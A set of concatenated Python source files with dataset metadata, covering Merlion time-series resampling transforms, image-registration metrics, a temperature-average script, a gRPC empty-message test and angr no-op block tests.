def requires_inversion_state(self):
return False
@property
def aggregation_policy(self) -> AggregationPolicy:
return self._aggregation_policy
@aggregation_policy.setter
def aggregation_policy(self, agg: Union[str, AggregationPolicy]):
if isinstance(agg, str):
valid = set(AggregationPolicy.__members__.keys())
if agg not in valid:
raise KeyError(f"{agg} is not a valid aggregation policy. Valid aggregation policies are: {valid}")
agg = AggregationPolicy[agg]
self._aggregation_policy = agg
@property
def missing_value_policy(self) -> MissingValuePolicy:
return self._missing_value_policy
@missing_value_policy.setter
def missing_value_policy(self, mv: Union[str, MissingValuePolicy]):
if isinstance(mv, str):
valid = set(MissingValuePolicy.__members__.keys())
if mv not in valid:
raise KeyError(f"{mv} is not a valid missing value policy. Valid aggregation policies are: {valid}")
mv = MissingValuePolicy[mv]
self._missing_value_policy = mv
def train(self, time_series: TimeSeries):
if self.trainable_granularity:
self.granularity = get_gcd_timedelta(*[var.time_stamps for var in time_series.univariates])
if self.trainable_granularity or self.origin is None:
t0, tf = time_series.t0, time_series.tf
if self.granularity:
offset = (tf - t0) % self.granularity
else:
offset = 0
self.origin = t0 + offset
def __call__(self, time_series: TimeSeries) -> TimeSeries:
if self.granularity is None:
logger.warning(
f"Skipping resampling step because granularity is "
f"None. Please either specify a granularity or train "
f"this transformation on a time series."
)
return time_series
return time_series.align(
alignment_policy=AlignPolicy.FixedGranularity,
granularity=self.granularity,
origin=self.origin,
remove_non_overlapping=self.remove_non_overlapping,
aggregation_policy=self.aggregation_policy,
missing_value_policy=self.missing_value_policy,
)
class Shingle(InvertibleTransformBase):
"""
Stacks adjacent observations into a single vector. Downsamples by the
specified stride (less than or equal to the shingle size) if desired.
More concretely, consider an input time series,
.. code-block:: python
TimeSeries(
UnivariateTimeSeries((t1[0], x1[0]), ..., (t1[m], t1[m])),
UnivariateTimeSeries((t2[0], x2[0]), ..., (t2[m], t2[m])),
)
Applying a shingle of size 3 and stride 2 will yield
.. code-block:: python
TimeSeries(
UnivariateTimeSeries((t1[0], x1[0]), (t1[2], x1[2]), ..., (t1[m-2], x1[m-2])),
UnivariateTimeSeries((t1[1], x1[1]), (t1[3], x1[3]), ..., (t1[m-1], x1[m-1])),
UnivariateTimeSeries((t1[2], x1[2]), (t1[4], x1[4]), ..., (t1[m], x1[m])),
UnivariateTimeSeries((t2[0], x2[0]), (t2[2], x2[2]), ..., (t2[m-2], x2[m-2])),
UnivariateTimeSeries((t2[1], x2[1]), (t2[3], x2[3]), ..., (t2[m-1], x2[m-1])),
UnivariateTimeSeries((t2[2], x2[2]), (t2[4], x2[4]), ..., (t2[m], x2[m])),
)
If the length of any univariate is not perfectly divisible by the stride, we
will pad it on the left side with the first value in the univariate.
"""
def __init__(self, size: int = 1, stride: int = 1, multivar_skip=True):
"""
Converts the time series into shingle vectors of the appropriate size.
This converts each univariate into a multivariate time series with
``size`` variables.
:param size: let x(t) = value_t be the value of the time series at
time index t. Then, the output vector for time index t will be
:code:`[x(t - size + 1), ..., x(t - 1), x(t)]`.
:param stride: The stride at which the output vectors are downsampled.
:param multivar_skip: Whether to skip this transform if the transform
is already multivariate.
"""
super().__init__()
assert size >= 0
assert 1 <= stride <= size
self.stride = stride
self.size = size
self.multivar_skip = multivar_skip
def train(self, time_series: TimeSeries):
pass
def __call__(self, time_series: TimeSeries) -> TimeSeries:
if self.multivar_skip and time_series.dim > 1:
self.inversion_state = "skip"
return time_series
new_vars = OrderedDict()
for name, var in time_series.items():
# Left-pad the time series with the first value
x0 = var.np_values[0]
vals = np.concatenate((np.full(self.size - 1, x0), var.np_values))
# Stack adjacent observations into vectors of length self.size,
# and apply any striding desired
i0 = (len(var) - 1) % self.stride
times = var.index[i0 :: self.stride]
all_vals = np.stack([vals[i : len(vals) - self.size + i + 1] for i in range(self.size)])
all_vals = all_vals[:, i0 :: self.stride]
# Convert the stacked values into UnivariateTimeSeries objects
new_vars.update(
OrderedDict([(f"{name}_{i}", UnivariateTimeSeries(times, x)) for i, x in enumerate(all_vals)])
)
# The inversion state is just the timestamps of the univariates before
# shingling occurs, and the name of the original univariate
self.inversion_state = [(name, v.index) for name, v in time_series.items()]
return TimeSeries(new_vars)
def _invert(self, time_series: TimeSeries) -> TimeSeries:
if self.inversion_state == "skip":
return time_series
new_vars = OrderedDict()
for i, (name, time_stamps) in enumerate(self.inversion_state):
vals = []
expected_src_names = [f"{name}_{i}" for i in range(self.size)]
src_names = time_series.names[i * self.size : (i + 1) * self.size]
src = TimeSeries(OrderedDict([(k, time_series.univariates[k]) for k in src_names]))
assert src.is_aligned and src.dim == self.size, (
f"{self} should convert a univariate time series into an "
f"aligned multivariate time series of dim {self.size}, but "
f"something went wrong."
)
assert (
src.names == expected_src_names
), f"Expected univariates named {expected_src_names}, but got {src.names}"
for j, (t, val_vec) in enumerate(src[::-1]):
j0 = j * self.stride
val_vec = val_vec[::-1]
vals.extend(val_vec[len(vals) - j0 :])
vals = vals[len(time_stamps) :: -1][-len(time_stamps) :]
new_vars[name] = UnivariateTimeSeries(time_stamps, vals)
return TimeSeries(new_vars)
|
<filename>merlion/transform/resample.py
#
# Copyright (c) 2021 salesforce.com, inc.
# All rights reserved.
# SPDX-License-Identifier: BSD-3-Clause
# For full license text, see the LICENSE file in the repo root or https://opensource.org/licenses/BSD-3-Clause
#
"""
Transforms that resample the input in time, or stack adjacent observations
into vectors.
"""
from collections import OrderedDict
import logging
from typing import List, Tuple, Union
import numpy as np
from merlion.transform.base import TransformBase, InvertibleTransformBase
from merlion.utils import UnivariateTimeSeries, TimeSeries
from merlion.utils.resample import (
granularity_str_to_seconds,
get_gcd_timedelta,
reindex_df,
AlignPolicy,
AggregationPolicy,
MissingValuePolicy,
)
logger = logging.getLogger(__name__)
class TemporalResample(TransformBase):
"""
Defines a policy to temporally resample a time series at a specified
granularity. Note that while this transform does support inversion, the
recovered time series may differ from the input due to information loss
when downsampling.
"""
def __init__(
self,
granularity: Union[str, int, float] = None,
origin: int = None,
trainable_granularity: bool = None,
remove_non_overlapping=True,
aggregation_policy: Union[str, AggregationPolicy] = "Mean",
missing_value_policy: Union[str, MissingValuePolicy] = "Interpolate",
):
"""
Defines a policy to temporally resample a time series.
:param granularity: The granularity at which we want to resample.
:param origin: The time stamp defining the offset to start at.
:param trainable_granularity: Whether the granularity is trainable,
i.e. train() will set it to the GCD timedelta of a time series.
If ``None`` (default), it will be trainable only if no granularity is
explicitly given.
:param remove_non_overlapping: If ``True``, we will only keep the portions
of the univariates that overlap with each other. For example, if we
have 3 univariates which span timestamps [0, 3600], [60, 3660], and
[30, 3540], we will only keep timestamps in the range [60, 3540]. If
``False``, we will keep all timestamps produced by the resampling.
:param aggregation_policy: The policy we will use to aggregate multiple
values in a window (downsampling).
:param missing_value_policy: The policy we will use to impute missing
values (upsampling).
"""
super().__init__()
if not isinstance(granularity, (int, float)):
granularity = granularity_str_to_seconds(granularity)
self.granularity = granularity
self.origin = origin
if trainable_granularity is None:
trainable_granularity = granularity is None
self.trainable_granularity = trainable_granularity
self.remove_non_overlapping = remove_non_overlapping
self.aggregation_policy = aggregation_policy
self.missing_value_policy = missing_value_policy
@property
def requires_inversion_state(self):
return False
@property
def aggregation_policy(self) -> AggregationPolicy:
return self._aggregation_policy
@aggregation_policy.setter
def aggregation_policy(self, agg: Union[str, AggregationPolicy]):
if isinstance(agg, str):
valid = set(AggregationPolicy.__members__.keys())
if agg not in valid:
raise KeyError(f"{agg} is not a valid aggregation policy. Valid aggregation policies are: {valid}")
agg = AggregationPolicy[agg]
self._aggregation_policy = agg
@property
def missing_value_policy(self) -> MissingValuePolicy:
return self._missing_value_policy
@missing_value_policy.setter
def missing_value_policy(self, mv: Union[str, MissingValuePolicy]):
if isinstance(mv, str):
valid = set(MissingValuePolicy.__members__.keys())
if mv not in valid:
raise KeyError(f"{mv} is not a valid missing value policy. Valid aggregation policies are: {valid}")
mv = MissingValuePolicy[mv]
self._missing_value_policy = mv
def train(self, time_series: TimeSeries):
if self.trainable_granularity:
self.granularity = get_gcd_timedelta(*[var.time_stamps for var in time_series.univariates])
if self.trainable_granularity or self.origin is None:
t0, tf = time_series.t0, time_series.tf
if self.granularity:
offset = (tf - t0) % self.granularity
else:
offset = 0
self.origin = t0 + offset
def __call__(self, time_series: TimeSeries) -> TimeSeries:
if self.granularity is None:
logger.warning(
f"Skipping resampling step because granularity is "
f"None. Please either specify a granularity or train "
f"this transformation on a time series."
)
return time_series
return time_series.align(
alignment_policy=AlignPolicy.FixedGranularity,
granularity=self.granularity,
origin=self.origin,
remove_non_overlapping=self.remove_non_overlapping,
aggregation_policy=self.aggregation_policy,
missing_value_policy=self.missing_value_policy,
)
class Shingle(InvertibleTransformBase):
"""
Stacks adjacent observations into a single vector. Downsamples by the
specified stride (less than or equal to the shingle size) if desired.
More concretely, consider an input time series,
.. code-block:: python
TimeSeries(
UnivariateTimeSeries((t1[0], x1[0]), ..., (t1[m], t1[m])),
UnivariateTimeSeries((t2[0], x2[0]), ..., (t2[m], t2[m])),
)
Applying a shingle of size 3 and stride 2 will yield
.. code-block:: python
TimeSeries(
UnivariateTimeSeries((t1[0], x1[0]), (t1[2], x1[2]), ..., (t1[m-2], x1[m-2])),
UnivariateTimeSeries((t1[1], x1[1]), (t1[3], x1[3]), ..., (t1[m-1], x1[m-1])),
UnivariateTimeSeries((t1[2], x1[2]), (t1[4], x1[4]), ..., (t1[m], x1[m])),
UnivariateTimeSeries((t2[0], x2[0]), (t2[2], x2[2]), ..., (t2[m-2], x2[m-2])),
UnivariateTimeSeries((t2[1], x2[1]), (t2[3], x2[3]), ..., (t2[m-1], x2[m-1])),
UnivariateTimeSeries((t2[2], x2[2]), (t2[4], x2[4]), ..., (t2[m], x2[m])),
)
If the length of any univariate is not perfectly divisible by the stride, we
will pad it on the left side with the first value in the univariate.
"""
def __init__(self, size: int = 1, stride: int = 1, multivar_skip=True):
"""
Converts the time series into shingle vectors of the appropriate size.
This converts each univariate into a multivariate time series with
``size`` variables.
:param size: let x(t) = value_t be the value of the time series at
time index t. Then, the output vector for time index t will be
:code:`[x(t - size + 1), ..., x(t - 1), x(t)]`.
:param stride: The stride at which the output vectors are downsampled.
:param multivar_skip: Whether to skip this transform if the transform
is already multivariate.
"""
super().__init__()
assert size >= 0
assert 1 <= stride <= size
self.stride = stride
self.size = size
self.multivar_skip = multivar_skip
def train(self, time_series: TimeSeries):
pass
def __call__(self, time_series: TimeSeries) -> TimeSeries:
if self.multivar_skip and time_series.dim > 1:
self.inversion_state = "skip"
return time_series
new_vars = OrderedDict()
for name, var in time_series.items():
# Left-pad the time series with the first value
x0 = var.np_values[0]
vals = np.concatenate((np.full(self.size - 1, x0), var.np_values))
# Stack adjacent observations into vectors of length self.size,
# and apply any striding desired
i0 = (len(var) - 1) % self.stride
times = var.index[i0 :: self.stride]
all_vals = np.stack([vals[i : len(vals) - self.size + i + 1] for i in range(self.size)])
all_vals = all_vals[:, i0 :: self.stride]
# Convert the stacked values into UnivariateTimeSeries objects
new_vars.update(
OrderedDict([(f"{name}_{i}", UnivariateTimeSeries(times, x)) for i, x in enumerate(all_vals)])
)
# The inversion state is just the timestamps of the univariates before
# shingling occurs, and the name of the original univariate
self.inversion_state = [(name, v.index) for name, v in time_series.items()]
return TimeSeries(new_vars)
def _invert(self, time_series: TimeSeries) -> TimeSeries:
if self.inversion_state == "skip":
return time_series
new_vars = OrderedDict()
for i, (name, time_stamps) in enumerate(self.inversion_state):
vals = []
expected_src_names = [f"{name}_{i}" for i in range(self.size)]
src_names = time_series.names[i * self.size : (i + 1) * self.size]
src = TimeSeries(OrderedDict([(k, time_series.univariates[k]) for k in src_names]))
assert src.is_aligned and src.dim == self.size, (
f"{self} should convert a univariate time series into an "
f"aligned multivariate time series of dim {self.size}, but "
f"something went wrong."
)
assert (
src.names == expected_src_names
), f"Expected univariates named {expected_src_names}, but got {src.names}"
for j, (t, val_vec) in enumerate(src[::-1]):
j0 = j * self.stride
val_vec = val_vec[::-1]
vals.extend(val_vec[len(vals) - j0 :])
vals = vals[len(time_stamps) :: -1][-len(time_stamps) :]
new_vars[name] = UnivariateTimeSeries(time_stamps, vals)
return TimeSeries(new_vars)
|
en
| 0.816088
|
# # Copyright (c) 2021 salesforce.com, inc. # All rights reserved. # SPDX-License-Identifier: BSD-3-Clause # For full license text, see the LICENSE file in the repo root or https://opensource.org/licenses/BSD-3-Clause # Transforms that resample the input in time, or stack adjacent observations into vectors. Defines a policy to temporally resample a time series at a specified granularity. Note that while this transform does support inversion, the recovered time series may differ from the input due to information loss when downsampling. Defines a policy to temporally resample a time series. :param granularity: The granularity at which we want to resample. :param origin: The time stamp defining the offset to start at. :param trainable_granularity: Whether the granularity is trainable, i.e. train() will set it to the GCD timedelta of a time series. If ``None`` (default), it will be trainable only if no granularity is explicitly given. :param remove_non_overlapping: If ``True``, we will only keep the portions of the univariates that overlap with each other. For example, if we have 3 univariates which span timestamps [0, 3600], [60, 3660], and [30, 3540], we will only keep timestamps in the range [60, 3540]. If ``False``, we will keep all timestamps produced by the resampling. :param aggregation_policy: The policy we will use to aggregate multiple values in a window (downsampling). :param missing_value_policy: The policy we will use to impute missing values (upsampling). Stacks adjacent observations into a single vector. Downsamples by the specified stride (less than or equal to the shingle size) if desired. More concretely, consider an input time series, .. code-block:: python TimeSeries( UnivariateTimeSeries((t1[0], x1[0]), ..., (t1[m], t1[m])), UnivariateTimeSeries((t2[0], x2[0]), ..., (t2[m], t2[m])), ) Applying a shingle of size 3 and stride 2 will yield .. code-block:: python TimeSeries( UnivariateTimeSeries((t1[0], x1[0]), (t1[2], x1[2]), ..., (t1[m-2], x1[m-2])), UnivariateTimeSeries((t1[1], x1[1]), (t1[3], x1[3]), ..., (t1[m-1], x1[m-1])), UnivariateTimeSeries((t1[2], x1[2]), (t1[4], x1[4]), ..., (t1[m], x1[m])), UnivariateTimeSeries((t2[0], x2[0]), (t2[2], x2[2]), ..., (t2[m-2], x2[m-2])), UnivariateTimeSeries((t2[1], x2[1]), (t2[3], x2[3]), ..., (t2[m-1], x2[m-1])), UnivariateTimeSeries((t2[2], x2[2]), (t2[4], x2[4]), ..., (t2[m], x2[m])), ) If the length of any univariate is not perfectly divisible by the stride, we will pad it on the left side with the first value in the univariate. Converts the time series into shingle vectors of the appropriate size. This converts each univariate into a multivariate time series with ``size`` variables. :param size: let x(t) = value_t be the value of the time series at time index t. Then, the output vector for time index t will be :code:`[x(t - size + 1), ..., x(t - 1), x(t)]`. :param stride: The stride at which the output vectors are downsampled. :param multivar_skip: Whether to skip this transform if the transform is already multivariate. # Left-pad the time series with the first value # Stack adjacent observations into vectors of length self.size, # and apply any striding desired # Convert the stacked values into UnivariateTimeSeries objects # The inversion state is just the timestamps of the univariates before # shingling occurs, and the name of the original univariate
| 2.445894
| 2
|
evaluation.py
|
MingR-Ma/SEN-FCB
| 0
|
6627587
|
<filename>evaluation.py
"""Used for evaluate the registration performance"""
import numpy as np
import pystrum.pynd.ndutils as nd
def dice(array1, array2, labels):
"""
:parameter array1: input fixed or warped image.
:parameter array2: input warped or fixed image.
:parameter labels: type: 'list', the unique label number in one image pair.
Computes the dice overlap between two arrays for a given set of integer labels.
:return a list as the label length
"""
dicem = np.zeros(len(labels))
for idx, label in enumerate(labels):
top = 2 * np.sum(np.logical_and(array1 == label, array2 == label))
bottom = np.sum(array1 == label) + np.sum(array2 == label)
bottom = np.maximum(bottom, np.finfo(float).eps) # add epsilon
dicem[idx] = top / bottom
return dicem
def jacobian_determinant(disp):
volshape = disp.shape[:-1]
nb_dims = len(volshape)
assert len(volshape) in (2, 3), 'deformation field has to be 2D or 3D'
grid_lst = nd.volsize2ndgrid(volshape)
grid = np.stack(grid_lst, len(volshape))
J = np.gradient(disp + grid)
if nb_dims == 3:
dx = J[0]
dy = J[1]
dz = J[2]
Jdet0 = dx[..., 0] * (dy[..., 1] * dz[..., 2] - dy[..., 2] * dz[..., 1])
Jdet1 = dx[..., 1] * (dy[..., 0] * dz[..., 2] - dy[..., 2] * dz[..., 0])
Jdet2 = dx[..., 2] * (dy[..., 0] * dz[..., 1] - dy[..., 1] * dz[..., 0])
return Jdet0 - Jdet1 + Jdet2
else:
dfdx = J[0]
dfdy = J[1]
return dfdx[..., 0] * dfdy[..., 1] - dfdy[..., 0] * dfdx[..., 1]
|
<filename>evaluation.py
"""Used for evaluate the registration performance"""
import numpy as np
import pystrum.pynd.ndutils as nd
def dice(array1, array2, labels):
"""
:parameter array1: input fixed or warped image.
:parameter array2: input warped or fixed image.
:parameter labels: type: 'list', the unique label number in one image pair.
Computes the dice overlap between two arrays for a given set of integer labels.
:return a list as the label length
"""
dicem = np.zeros(len(labels))
for idx, label in enumerate(labels):
top = 2 * np.sum(np.logical_and(array1 == label, array2 == label))
bottom = np.sum(array1 == label) + np.sum(array2 == label)
bottom = np.maximum(bottom, np.finfo(float).eps) # add epsilon
dicem[idx] = top / bottom
return dicem
def jacobian_determinant(disp):
volshape = disp.shape[:-1]
nb_dims = len(volshape)
assert len(volshape) in (2, 3), 'deformation field has to be 2D or 3D'
grid_lst = nd.volsize2ndgrid(volshape)
grid = np.stack(grid_lst, len(volshape))
J = np.gradient(disp + grid)
if nb_dims == 3:
dx = J[0]
dy = J[1]
dz = J[2]
Jdet0 = dx[..., 0] * (dy[..., 1] * dz[..., 2] - dy[..., 2] * dz[..., 1])
Jdet1 = dx[..., 1] * (dy[..., 0] * dz[..., 2] - dy[..., 2] * dz[..., 0])
Jdet2 = dx[..., 2] * (dy[..., 0] * dz[..., 1] - dy[..., 1] * dz[..., 0])
return Jdet0 - Jdet1 + Jdet2
else:
dfdx = J[0]
dfdy = J[1]
return dfdx[..., 0] * dfdy[..., 1] - dfdy[..., 0] * dfdx[..., 1]
|
en
| 0.636025
|
Used for evaluate the registration performance :parameter array1: input fixed or warped image. :parameter array2: input warped or fixed image. :parameter labels: type: 'list', the unique label number in one image pair. Computes the dice overlap between two arrays for a given set of integer labels. :return a list as the label length # add epsilon
| 2.926275
| 3
|
calculadoraTemp.py
|
Danieldevop/Python-examples
| 0
|
6627588
|
<reponame>Danieldevop/Python-examples<filename>calculadoraTemp.py
# -*- coding:utf-8 -*-
def average_temps(temps):
sum_of_temps = 0
for temp in temps:
sum_of_temps += float(temp)
return sum_of_temps / len(temps)
if __name__ == '__main__':
temps = [21, 24, 24, 22, 20, 23, 24]
average = average_temps(temps)
print("la temp promedio es: {}".format(average))
|
# -*- coding:utf-8 -*-
def average_temps(temps):
sum_of_temps = 0
for temp in temps:
sum_of_temps += float(temp)
return sum_of_temps / len(temps)
if __name__ == '__main__':
temps = [21, 24, 24, 22, 20, 23, 24]
average = average_temps(temps)
print("la temp promedio es: {}".format(average))
|
en
| 0.736017
|
# -*- coding:utf-8 -*-
| 3.846793
| 4
|
src/python/grpcio_tests/tests/unit/_empty_message_test.py
|
duanwujie/grpc-hacking
| 9
|
6627589
|
<reponame>duanwujie/grpc-hacking
# Copyright 2016, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest
import grpc
from grpc.framework.foundation import logging_pool
from tests.unit.framework.common import test_constants
_REQUEST = b''
_RESPONSE = b''
_UNARY_UNARY = '/test/UnaryUnary'
_UNARY_STREAM = '/test/UnaryStream'
_STREAM_UNARY = '/test/StreamUnary'
_STREAM_STREAM = '/test/StreamStream'
def handle_unary_unary(request, servicer_context):
return _RESPONSE
def handle_unary_stream(request, servicer_context):
for _ in range(test_constants.STREAM_LENGTH):
yield _RESPONSE
def handle_stream_unary(request_iterator, servicer_context):
for request in request_iterator:
pass
return _RESPONSE
def handle_stream_stream(request_iterator, servicer_context):
for request in request_iterator:
yield _RESPONSE
class _MethodHandler(grpc.RpcMethodHandler):
def __init__(self, request_streaming, response_streaming):
self.request_streaming = request_streaming
self.response_streaming = response_streaming
self.request_deserializer = None
self.response_serializer = None
self.unary_unary = None
self.unary_stream = None
self.stream_unary = None
self.stream_stream = None
if self.request_streaming and self.response_streaming:
self.stream_stream = handle_stream_stream
elif self.request_streaming:
self.stream_unary = handle_stream_unary
elif self.response_streaming:
self.unary_stream = handle_unary_stream
else:
self.unary_unary = handle_unary_unary
class _GenericHandler(grpc.GenericRpcHandler):
def service(self, handler_call_details):
if handler_call_details.method == _UNARY_UNARY:
return _MethodHandler(False, False)
elif handler_call_details.method == _UNARY_STREAM:
return _MethodHandler(False, True)
elif handler_call_details.method == _STREAM_UNARY:
return _MethodHandler(True, False)
elif handler_call_details.method == _STREAM_STREAM:
return _MethodHandler(True, True)
else:
return None
class EmptyMessageTest(unittest.TestCase):
def setUp(self):
self._server_pool = logging_pool.pool(test_constants.THREAD_CONCURRENCY)
self._server = grpc.server(
self._server_pool, handlers=(_GenericHandler(),))
port = self._server.add_insecure_port('[::]:0')
self._server.start()
self._channel = grpc.insecure_channel('localhost:%d' % port)
def tearDown(self):
self._server.stop(0)
def testUnaryUnary(self):
response = self._channel.unary_unary(_UNARY_UNARY)(_REQUEST)
self.assertEqual(_RESPONSE, response)
def testUnaryStream(self):
response_iterator = self._channel.unary_stream(_UNARY_STREAM)(_REQUEST)
self.assertSequenceEqual(
[_RESPONSE] * test_constants.STREAM_LENGTH, list(response_iterator))
def testStreamUnary(self):
response = self._channel.stream_unary(_STREAM_UNARY)(
[_REQUEST] * test_constants.STREAM_LENGTH)
self.assertEqual(_RESPONSE, response)
def testStreamStream(self):
response_iterator = self._channel.stream_stream(_STREAM_STREAM)(
[_REQUEST] * test_constants.STREAM_LENGTH)
self.assertSequenceEqual(
[_RESPONSE] * test_constants.STREAM_LENGTH, list(response_iterator))
if __name__ == '__main__':
unittest.main(verbosity=2)
|
# Copyright 2016, Google Inc.
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met:
#
# * Redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above
# copyright notice, this list of conditions and the following disclaimer
# in the documentation and/or other materials provided with the
# distribution.
# * Neither the name of Google Inc. nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
import unittest
import grpc
from grpc.framework.foundation import logging_pool
from tests.unit.framework.common import test_constants
_REQUEST = b''
_RESPONSE = b''
_UNARY_UNARY = '/test/UnaryUnary'
_UNARY_STREAM = '/test/UnaryStream'
_STREAM_UNARY = '/test/StreamUnary'
_STREAM_STREAM = '/test/StreamStream'
def handle_unary_unary(request, servicer_context):
return _RESPONSE
def handle_unary_stream(request, servicer_context):
for _ in range(test_constants.STREAM_LENGTH):
yield _RESPONSE
def handle_stream_unary(request_iterator, servicer_context):
for request in request_iterator:
pass
return _RESPONSE
def handle_stream_stream(request_iterator, servicer_context):
for request in request_iterator:
yield _RESPONSE
class _MethodHandler(grpc.RpcMethodHandler):
def __init__(self, request_streaming, response_streaming):
self.request_streaming = request_streaming
self.response_streaming = response_streaming
self.request_deserializer = None
self.response_serializer = None
self.unary_unary = None
self.unary_stream = None
self.stream_unary = None
self.stream_stream = None
if self.request_streaming and self.response_streaming:
self.stream_stream = handle_stream_stream
elif self.request_streaming:
self.stream_unary = handle_stream_unary
elif self.response_streaming:
self.unary_stream = handle_unary_stream
else:
self.unary_unary = handle_unary_unary
class _GenericHandler(grpc.GenericRpcHandler):
def service(self, handler_call_details):
if handler_call_details.method == _UNARY_UNARY:
return _MethodHandler(False, False)
elif handler_call_details.method == _UNARY_STREAM:
return _MethodHandler(False, True)
elif handler_call_details.method == _STREAM_UNARY:
return _MethodHandler(True, False)
elif handler_call_details.method == _STREAM_STREAM:
return _MethodHandler(True, True)
else:
return None
class EmptyMessageTest(unittest.TestCase):
def setUp(self):
self._server_pool = logging_pool.pool(test_constants.THREAD_CONCURRENCY)
self._server = grpc.server(
self._server_pool, handlers=(_GenericHandler(),))
port = self._server.add_insecure_port('[::]:0')
self._server.start()
self._channel = grpc.insecure_channel('localhost:%d' % port)
def tearDown(self):
self._server.stop(0)
def testUnaryUnary(self):
response = self._channel.unary_unary(_UNARY_UNARY)(_REQUEST)
self.assertEqual(_RESPONSE, response)
def testUnaryStream(self):
response_iterator = self._channel.unary_stream(_UNARY_STREAM)(_REQUEST)
self.assertSequenceEqual(
[_RESPONSE] * test_constants.STREAM_LENGTH, list(response_iterator))
def testStreamUnary(self):
response = self._channel.stream_unary(_STREAM_UNARY)(
[_REQUEST] * test_constants.STREAM_LENGTH)
self.assertEqual(_RESPONSE, response)
def testStreamStream(self):
response_iterator = self._channel.stream_stream(_STREAM_STREAM)(
[_REQUEST] * test_constants.STREAM_LENGTH)
self.assertSequenceEqual(
[_RESPONSE] * test_constants.STREAM_LENGTH, list(response_iterator))
if __name__ == '__main__':
unittest.main(verbosity=2)
|
en
| 0.718275
|
# Copyright 2016, Google Inc. # All rights reserved. # # Redistribution and use in source and binary forms, with or without # modification, are permitted provided that the following conditions are # met: # # * Redistributions of source code must retain the above copyright # notice, this list of conditions and the following disclaimer. # * Redistributions in binary form must reproduce the above # copyright notice, this list of conditions and the following disclaimer # in the documentation and/or other materials provided with the # distribution. # * Neither the name of Google Inc. nor the names of its # contributors may be used to endorse or promote products derived from # this software without specific prior written permission. # # THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS # "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT # LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR # A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT # OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, # SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT # LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, # DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY # THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT # (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE # OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
| 1.423991
| 1
|
tests/test_noop_blocks.py
|
Kyle-Kyle/angr
| 6,132
|
6627590
|
import archinfo
import angr
from angr.analyses.cfg import CFGBase
def test_x86_noop_blocks():
# nop
arch = archinfo.arch_from_id("x86")
b = b"\x90\x90\x90\x90\x90\x90\x90\x90"
p = angr.load_shellcode(b, arch, load_address=0x400000)
block = p.factory.block(0x400000, opt_level=1, cross_insn_opt=False)
assert CFGBase._is_noop_block(arch, block) is True
block = p.factory.block(0x400000, opt_level=1, cross_insn_opt=True)
assert CFGBase._is_noop_block(arch, block) is True
def test_amd64_noop_blocks():
# nop
arch = archinfo.arch_from_id("amd64")
b = b"\x90\x90\x90\x90\x90\x90\x90\x90"
p = angr.load_shellcode(b, arch, load_address=0x400000)
block = p.factory.block(0x400000, opt_level=1, cross_insn_opt=False)
assert CFGBase._is_noop_block(arch, block) is True
block = p.factory.block(0x400000, opt_level=1, cross_insn_opt=True)
assert CFGBase._is_noop_block(arch, block) is True
